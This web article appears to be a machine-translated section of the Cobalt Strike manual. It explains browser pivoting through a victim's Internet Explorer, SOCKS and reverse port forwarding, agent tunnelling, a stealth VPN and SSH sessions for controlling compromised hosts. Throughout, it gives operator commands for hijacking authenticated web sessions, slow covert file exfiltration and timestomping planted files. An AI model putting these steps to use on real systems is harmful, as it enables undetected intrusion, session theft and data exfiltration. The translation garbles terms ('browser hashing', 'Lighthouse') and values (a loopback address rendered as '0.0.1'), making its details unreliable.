CobaltStrike Guide. #5 Browser pivoting and SSH sessions

15 June 2023 19 minutes Author: Lady Liberty

Mastery of Browser Pivoting and SSH sessions with CobaltStrike

Want to learn the latest methods and techniques, such as Browser Pivoting and SSH Sessions, to ensure efficiency and infiltration in cyberspace? Our CobaltStrike guide provides in-depth information and training on these key aspects to help you expand your cyber security capabilities. In our CobaltStrike guide, we’ll focus on Browser Pivoting and SSH sessions, techniques that allow you to bypass restrictions and gain access to highly secure systems. You’ll learn how to efficiently maneuver through browsers and establish SSH sessions to gain control of target systems. Our guide offers practical examples, explanations and step-by-step instructions on how to use Browser Pivoting and SSH sessions in CobaltStrike. You’ll learn how to infiltrate web browsers and establish secure SSH connections to interact with target systems, increasing your efficiency and capabilities.

With our CobaltStrike guide, you’ll gain the necessary knowledge and skills to successfully use Browser Pivoting and SSH sessions to infiltrate and interact with information systems. The guide will help you expand your cyber security skills and ensure you are secure in the digital world. Access the CobaltStrike Guide today and deepen your knowledge of Browser Pivoting and SSH sessions to become more effective in cyber security and infiltration. You’ll learn how to use Browser Pivoting to maneuver through web browsers, using them as an entry point to target systems and extending your presence and control. In addition, you will explore SSH sessions and learn how to effectively establish secure communication channels, allowing you to interact with target systems with minimal risk of detection.

Browser Pivoting

Malware such as Zeus and its variants are injected into a user’s browser to steal banking information. This is a man-in-the-browser attack. It is called so because the attacker injects malware into the user’s browser.

Review

Man-in-the-browser malware uses two approaches to steal banking information. They either intercept the form data when it is sent to the server. For example, malware can connect PR_Write  to Firefox to intercept HTTP POS T data sent to Firefox. Or they inject JavaScript into certain web pages to trick the user into thinking the site is asking for information the attacker actually needs.

Cobalt Strike provides a third approach to man-in-the-browser attacks. This allows an attacker to intercept authenticated web sessions – every single one of them. Once a user visits a site, an attacker can ask the user’s browser to make requests on their behalf. When the user’s browser executes the request, it automatically re-authenticates  on any site the user is already logged into. I call this Browser Pivoting – because the attacker pivots his browser through the compromised user’s browser.

Figure 40. Browser rotation in action

Cobalt Strike’s browser hijacking feature for Internet Explorer injects an HTTP proxy into a compromised user’s browser. Do not confuse this with changing the user’s proxy settings. This proxy server does not affect how the user gets to the site. Rather, this proxy server is available to an attacker. All requests passing through it are executed by the user’s browser.

Settings

To configure the browser pivot, go to [beacon]  -> Explore  -> BrowserPivot. Select the instance of Internet Explorer you want to embed. You can also decide to which port to bind the proxy server for browsing the browser.

Figure 41. Start the compact browser

Keep in mind that the process you embed into is important. Embedding in Internet Explorer inherits authenticated user web sessions. Modern versions of Internet Explorer create each tab in a separate process. If the object is using a modern version of Internet Explorer, you must implement the process associated with the open tab to inherit the session state. Which tab’s process doesn’t matter (child tabs share session state).

Identify Internet Explorer tab processes by viewing the PPID value in the Browser Summary Configuration dialog box.

If the PPID refers to iexplore.exe, the process is associated with the tab. Cobalt Strike will show a checkmark next to the processes it thinks should be infiltrated.

After configuring browser hashing, configure your web browser to use a proxy server for browser hashing. Remember that the server for Cobalt Strike’s Browser Pivoting is an HTTP proxy.

Figure 42. Configuring browser settings

Using

You can browse web pages under the target user’s name after running browser hijacking. Keep in mind that a browser hashing proxy will provide its SSL certificate for SSL-enabled sites you visit. This is necessary for the technology to work.

The browser hashing proxy will ask you to add a host to your browser’s trusted data store when it detects an SSL error. Add these hosts to the list of approved hosts and click the refresh button to allow SSL secured sites to load properly.

If your browser attaches the target site’s certificate, you may find that it is not possible to force the browser to accept the SSL proxy certificate. This is very unpleasant. One option is to use a different browser. The open source Chromium browser has a command line option to ignore all certificate errors. This is perfect for using the browser summary feature:

chromium --ignore-certificate-errors --proxy-server=[хост]:[порт]

The above command is available in View -> Proxy Pivots. Highlight the HTTP proxy entry and click the Tunnel button. To disable browser proxy pivoting, type browserpivot stop in the Beacon console.

You will need to reconnect to the proxy server to bring up the browser if the user closes the tab you are working on. The Browser Summary tab will alert you if your browser cannot connect to the proxy server.

NOTE: OpenJDK 11 has a bug in its TLS implementation that causes ERR_SSL_PROTOCOL_ERROR (Chrome/Chromium) and SSL_ERROR_RX_RECORD_TOO_LONG (Firefox) when interacting with https:// sites. If you encounter these errors, downgrade your command server to Oracle Java 1.8 or OpenJDK 10.

How browser summarization works

Internet Explorer delegates all connections to the WinINet library. This library, which can be used by any application, manages cookies, SSL sessions, and server authentication for its users. Cobalt Strike browser summary takes advantage of the fact that WinINet transparently manages authentication and re-authentication for each process.

By embedding Cobalt Strike’s browser hijacking technology into the user’s instance of Internet Explorer, you get this transparent re-authentication for free.

Pivoting

What is Pivoting?

A turn, for the purposes of this guide, refers to turning a compromised system into an entry point for other attacks and tools. The beacon provides several turning options. For each of these options, you need to make sure your beacon is online. Interactive mode is when the beacon is registered several times per second. Use the sleep 0 command to place the beacon online.

SOCKS proxy

Go  to [beacon]  -> Pivoting  -> SOCKS Server to configure a SOCKS4 or SOCKS5 proxy server on your C&C server. Or use  socks 8080 to set the SOCKS proxy to port 8080 (or any other port of your choice).

All connections passing through these SOCKS servers are converted into connect, read, write, and close tasks to be executed by the appropriate beacon. You can tunnel with SOCKS through any type of beacon (even SMB Beacon).

The HTTP data stream for the beacon is the most suitable for return. If you need to redirect traffic through DNS, use TXT DNS record interaction mode.

Use  socks [port] [socks4 | socks5] [enableNoAuth | disableNoAuth] [user] [password] [enableLogging | disableLogging] to start a SOCKS4a (default if no server version is specified) or SOCKS5 server on the specified port. This server will relay the connection through this beacon.

SOCKS5 servers can be configured to support NoAuth (default), username/password authentication, and some optional logging mode.

SOCKS5 servers currently do not support GSSAPI and IPV6 authentication. To view the SOCKS servers that are currently configured, go to View  -> Proxy Pivots. Use socks stop to stop SOCKS servers and terminate existing connections. Traffic will not be transmitted while the beacon is asleep. To reduce the delay, change the sleep time using the sleep command.

Proxy chains

The proxychains tool forces a third-party application to use a SOCKS proxy that you specify. You can use proxy chains to force parties to use Cobalt Strike’s SOCKS server. To learn more about proxychains, visit : http://proxychains.sourceforge.net/.

Metasploit

You can also tunnel Metasploit framework exploits and modules with

Lighthouse. Create a Beacon SOCKS proxy (as described above) and paste the following into the framework’s Metasploit console:

setg Proxies socks4:<IP командного сервера>:<порт прокси> setg ReverseAllowProxy true

These commands will instruct the Metasploit framework to apply your proxy option to all modules running from now on. Once you’re done looping through the beacon like this, use unsetg Proxies to stop this behavior.

If you have trouble remembering all of the above, go to View -> Proxy Rods. Highlight the configured proxy switch and click Tunnel. This button will provide  the setg Proxies syntax needed to tunnel the Metasploit framework through your beacon.

Reverse port forward

The following commands are available:

rportfwd   – Use this command to set up a turnback via a beacon. The rportfwd command will bind the port to the compromised target. Any connection to this port will cause your Cobalt Strike server to initiate a connection to the other host/port and relay traffic between the two connections. Cobalt Strike tunnels this traffic through Beacon.

Syntax rportfwd – rportfwd [bind-port] [force-port] [force-port]

rportfwd_local – Use this command to set up a turnback via a beacon using one of the options. This function initiates a connection to the forwarded host/port from your Cobalt Strike client. Redirected traffic is passed through your Cobalt Strike client’s connection to the C&C server.

rportfwd stop [bind port] – Used to disable reverse port forward.

Spawning and tunneling

Use the spunnel command to run a third-party tool in a temporary process and create a reverse forward port for it. Syntax: spunnel [x86 or x64] [controller host] [controller port] [/path/to/agent.bin]. This command assumes that the agent file is position-independent shellcode (usually raw output from another offense framework). The spunnel_local command is similar to the spunnel command, except that it initiates a connection to the controller from within your Cobalt Strike client. spunnel_local traffic is transmitted through your Cobalt Strike client’s connection to the C&C server.

Agent Deployment: Interaction with Core Impact

The spunnel teams were designed specifically to tunnel a Core Impact agent through the beacon. Core Impact is a penetration testing tool and exploit framework, also available under license from HelpSystems at https://www.coresecurity.com/products/core-impact.

To export a raw agent file from Core Impact:

  1. Go to the Modules tab  in the Core Impact UI.

  2. Find a package and register an agent.

  3. Double click on this module.

  4. Change the platform to Windows.

  5. Change Architecture to x86-64.

  6. Change Binary Type to raw.

  7. Click Destination File and select … to choose where you want to save the result.

  8. Go to Advanced.

  9. Change Encrypt Code to false.

  10. Go to Agent Connection.

  11. The method of connection on Connect from Target.

  12. Change the Connect Back Hostname to 0.0.1.

  13. Change the Port value to a value (eg 9000) and make a note of it. Click OK.

The above steps will create the Core Impact agent as a raw file. You can use spunnel x64 or spunnel_ local x64 to run this agent and tunnel it back to Core Impact.

We often use Cobalt Strike on infrastructure with Internet access and Core Impact on a local Windows virtual machine. It is for this reason that we have spunnel_local. We recommend running the Cobalt Strike client from the same Windows system on which Core Impact is installed.

In this configuration, spunnel_local x64 127.0.0.1 9000 c:\path\to\agent.bin can be run. Once the connection is established, you will hear the famous “Agent Deployed” wav file playing.

With an agent of influence on a target, you have the tools to escalate privileges, scan and gather information with multiple modules, launch remote exploits, and chain with other agents of influence via beacon connections.

Pivot Listener

It is recommended to limit the number of direct connections from the target network to the command and control infrastructure. The Pivot Listener allows you to create a listener bound to a Beacon or SSH session. This way, you can create new reverse sessions without having to establish any more direct connections to your command-and-control infrastructure.

To set up a composite handler, go to [beacon]  -> Rotation -> Listener...  This will open a dialog where you can define a new composite handler.

Figure 43. Setting up the summary handler

The Pivot Listener binds to the port of the Listen Port parameter in the specified session from the Session parameter. The Listen Host value configures the address that will be used by your TCP return payload to connect to this listener.

Currently, the only payload option is windows/beacon_reverse_tcp. This is a Listener without an intern. This means that you cannot inject this payload into the commands and automation mechanisms that stagers expect. You have the option to export a stepless payload and run it to deliver the return TCP payload.

Pivot Listeners do not change the pivot host’s firewall configuration. If the composite host has a firewall, this may interfere with your listener. It is your responsibility to you, the operator, to anticipate this situation and take the correct steps to resolve it.

To remove a rotary listener, go to Cobalt Strike -> Listeners and remove the Listener there. Cobalt Strike will send a task to remove the listening socket if the session is still available.

Hidden VPN

VPN Pivoting is a flexible way to tunnel traffic to avoid the limitations inherent in Proxy Pivoting. Cobalt Strike provides VPN Pivoting with its Stealth VPN capability. Stealth VPN creates a network interface on the Cobalt Strike system and connects that interface to the target’s network.

How to deploy

To activate the hidden VPN, right click on the compromised host, go to [beacon] -> Pivot -> Deploy VPN . Select the remote interface to which you want to bind the hidden VPN. If the local interface does not exist, click Add to create it.

Figure 44. Stealth VPN deployment

Select the Clone host MAC address check box so that your local interface has the same MAC address as the remote interface. The safest thing to do is to leave this option checked. Click the Deploy button to launch the stealth VPN client on the site. Stealth VPN deployment requires administrator access.

When the hidden VPN interface is active, you can use it like any physical interface on your system. Use ifconfig to configure its IP address. If your target network has a DHCP server, you can query it for an IP address using the operating system’s built-in tools.

Interface management

To manage hidden VPN interfaces, go to Cobalt Strike -> VPN Interfaces. Here, Cobalt Strike will show the hidden VPN interfaces, their configuration, and the number of bytes sent and received through each interface.

Highlight the interface and click Delete to destroy the interface and close the hidden VPN remote client. Hidden VPN will delete its temporary files on reboot and automatically undo all system changes. Click Add  to configure a new hidden VPN interface.

Figure 45. Setting up a hidden VPN interface

Interface settings

Hidden VPN interfaces consist of a network tap (network tap) and a channel for transmitting Ethernet frames. To configure an interface, select an interface name (which you will control with ifconfig later) and a MAC address.

You must also configure a hidden VPN connection for your interface. A hidden VPN can transmit Ethernet frames over a UDP connection, a TCP connection, ICMP, or using the HTTP protocol. The target connects to your Cobalt Strike instance over a TCP (Reverse) channel. A TCP channel (Bind) forces Cobalt Strike to tunnel the VPN through the beacon.

Cobalt Strike will configure and manage the interaction with the stealth VPN client based on the selected local port and channel.

The HTTP channel of the hidden VPN uses the Cobalt Strike web server. You can host other web applications and multiple hidden HTTP VPN channels on the same port.

For best performance, use a UDP channel. It has the lowest amount of overhead compared to TCP and HTTP channels. Use ICMP, HTTP, or TCP (Bind) channels if you need to bypass firewall restrictions.

Although stealth VPN has the advantage of flexibility, using VPN Pivoting instead of Proxy Pivoting will depend on the situation. Stealth VPN requires administrator access. Proxy transition is not required. Stealth VPN creates a new communication channel. No proxy summary is created. First, you should use Proxy Pivoting and switch to VPN Pivoting when necessary.

SSH sessions

SSH client

Cobalt Strike manages UNIX targets using a built-in SSH client. This SSH client receives tasks from the parent Beacon and routes their output through it. Right click on the target and go to Login -> ssh to authenticate with username and password. Go  to Login -> ssh (  key) to authenticate with the key.

From the beacon console, use  ssh [pid] [arch] [target] [user] [password] to inject the specified process to start the SSH client and attempt to connect to the specified target device. Use ssh  [target] [user] [password] (without the [pid] and [arch] arguments) to create a temporary process to start an SSH client and attempt to connect to the specified target.

You can also use the ssh key [pid] [arch] [target:port] [user] [/path/ to/key.pem] to inject the specified startup process into the SSH client and attempt to connect to the specified target. Use the ssh key [target:port] [user] [/path/ to/key.pem] (without [pid] and [arch] arguments) to create a temporary process to start an SSH client and try to connect to the specified target volume object

NOTE: The key file must be in PEM format. If the file is not in PEM format, make a copy of the file and convert the copy using the following command: /usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p.

These commands start the Cobalt Strike SSH client. The client will report any connection or authentication issues to the parent beacon. If the connection is successful, you will see a new session in the Cobalt Strike window. This is an SSH session. Right-click on this session and select Interact to open the SSH console. Type help to see a list of commands supported by an SSH session. Help type and then the name of the command to get more information about it.

Execution of commands

The shell command  will execute the command with the arguments you specify. Executing commands blocks SSH sessions for up to 20 seconds, after which Cobalt Strike puts the command in the background. Cobalt Strike will report the results of these long-running commands as they run.

Use sudo [password] [command + arguments] to try to execute the command with sudo. This alias requires the sudo command on the target system to accept the -S flag. The cd command  will change the current working directory for the SSH session. The pwd command tells you the current working directory.

Transferring and downloading files

The following commands are available:

download – this command downloads the requested file. There is no need to specify quotation marks for a file name with spaces. Beacon is designed for “low and slow” data leakage. At each check-in, Beacon will download a fixed chunk of each file it is instructed to retrieve. The size of this chunk depends on the current Beacon data channel. HTTP and HTTPS channels receive data in 512 KB chunks.

downloads – Used to view the list of downloads for this beacon.

cancel – Type this command followed by the file name to cancel the current  download for download. You can use wildcards in this command to cancel multiple downloads of multiple files at once.

upload – this command uploads a file to the host.

timestomp – When uploading a file, it is sometimes necessary to update its timestamps so that it mixes with other files in the same folder. This command will help you do that. You can use the timestomp command to compare the modified, accessed, and created times of one file against another.

Go to View -> Downloads in Cobalt Strike to see the files your team has already uploaded. Only completed downloads are displayed on this tab.

Uploaded files are stored on the C&C server. To transfer files to your system, select them and click Sync Files. Cobalt Strike will then download the selected files to a folder of your choice on your system.

Peer C2

SSH sessions can manage TCP beacons. Use the connect command to take control of a TCP beacon that is waiting for a connection. Use the unlink command to disconnect the TCP beacon session.

Go to [session]  -> Listeners -> Pivot Listener…   to configure the pivot listener bound to this SSH session. This would allow a compromised UNIX entity to receive return TCP Beacon sessions. This option requires the GatewayPorts background service option for SSH to be set to yes or ClientSpecified.

SOCKS Pivoting and Reverse Port Forward

The following commands are available:

NOTE: Type help in the Beacon console to view available commands. Type help followed by the name of the command to see detailed help.

socks –  Use this command to create a SOCKS server on your C&C server that forwards traffic over an SSH session. The rportfwd command  will also create a forward reverse port that routes traffic through the SSH session and your beacon chain.

There is one caveat: the rportfwd command asks the SSH background service to bind to all interfaces. It is likely that the SSH background service will override this and force the port to bind to localhost. You need to change the GatewayPorts setting for the SSH background service to yes or ClientDefined.

Thanks to various open source guides.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.